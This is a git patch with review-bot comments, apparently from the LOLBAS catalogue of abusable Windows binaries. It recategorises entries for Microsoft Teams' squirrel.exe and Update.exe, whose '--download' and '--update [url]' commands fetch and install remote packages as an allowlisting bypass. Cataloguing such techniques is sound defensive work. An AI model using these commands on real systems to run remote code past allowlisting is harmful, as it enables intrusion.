From e05ae6c051cf75b89c3de1461a074d46032f7d36 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 28 Jun 2019 09:05:27 +0200 Subject: [PATCH] Adjusted Update and Squirrel --- yml/OtherMSBinaries/squirrel.yml | 16 ++++++++-------- yml/OtherMSBinaries/update.yml | 14 +++++++------- 2 files changed, 15 insertions(+), 15 deletions(-) diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/squirrel.yml index 8ee7ce0..ff1ae90 100644 --- a/yml/OtherMSBinaries/squirrel.yml +++ b/yml/OtherMSBinaries/squirrel.yml 
@@ -6,24 +6,24 @@ Created: '2019-06-26' Commands: - Command: squirrel.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. - Usecase: Download and execute binary - Category: Execute + Usecase: Download binary + Category: Download Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: squirrel.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + - Command: squirrel.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows 10 - - Command: squirrel.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: squirrel.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary - Category: Download + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/update.yml index 53ac526..33c30b8 100644 --- a/yml/OtherMSBinaries/update.yml +++ b/yml/OtherMSBinaries/update.yml 
@@ -6,24 +6,24 @@ Created: '2019-06-26' Commands: - Command: Update.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. - Usecase: Download and execute binary - Category: Execute + Usecase: Download binary + Category: Download Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + - Command: Update.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + - Command: Update.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary - Category: Download + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/
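Review bot: in yml/OtherMSBinaries/squirrel.yml the two `squirrel.exe --update [url to package]` entries end up with the same Command, Description and Usecase and differ only in Category (AWL Bypass vs Execute). The Usecase `Download and execute binary` does not say what the AWL Bypass entry bypasses, so give that entry its own Usecase wording or explain in its Description why the same command is listed twice. The new Description also says "download and install" while the Usecase says "Download and execute"; if installing the package is what runs its content, state that in the Description so the Execute category is justified by the text.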
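Review bot: in yml/OtherMSBinaries/update.yml the first entry (`Update.exe --download [url to package]`) is recategorised to `Category: Download` with `Usecase: Download binary`, but the unchanged context keeps `MitreID: T1218` and its MitreLink, which is the proxy-execution technique. Confirm that mapping still fits a download-only entry, and if not, change MitreID and MitreLink together; the same applies to the `--download` entry in squirrel.yml. The third entry's OperatingSystem line falls outside the hunk in both files, so check that it reads the same as the other two entries after this change.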